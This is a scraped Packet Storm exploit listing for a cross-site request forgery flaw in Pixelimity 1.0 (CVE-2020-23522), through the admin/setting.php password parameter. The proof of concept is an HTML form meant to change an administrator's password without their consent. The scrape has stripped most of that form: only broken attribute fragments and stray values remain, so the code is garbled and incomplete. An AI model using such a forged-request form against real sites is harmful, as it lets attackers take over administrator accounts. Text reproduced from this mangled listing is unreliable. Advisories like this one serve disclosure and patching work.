Pixelimity 1.0 Cross Site Request Forgery ≈ Packet Storm
# Exploit Title: Pixelimity 1.0 - 'password' Cross-Site Request Forgery
# Date: 2020-06-03
# Exploit Author: Noth
# Vendor Homepage: https://github.com/pixelimity/pixelimity
# Software Link: https://github.com/pixelimity/pixelimity
# Version: v1.0
# CVE : 2020-23522Pixelimity 1.0 has cross-site request forgery via the admin/setting.php data [Password] parameter.
PoC :
” method=“POST”>
value=“5”/>
value=“5”/>
value=“456789”/>
value=“Pixelimity”/>
value=“My Online Portfolio”/>
” value=“ 240&44;0,0&44;auto ”/>
value=“720&44;0,0&44;auto”/>
Comments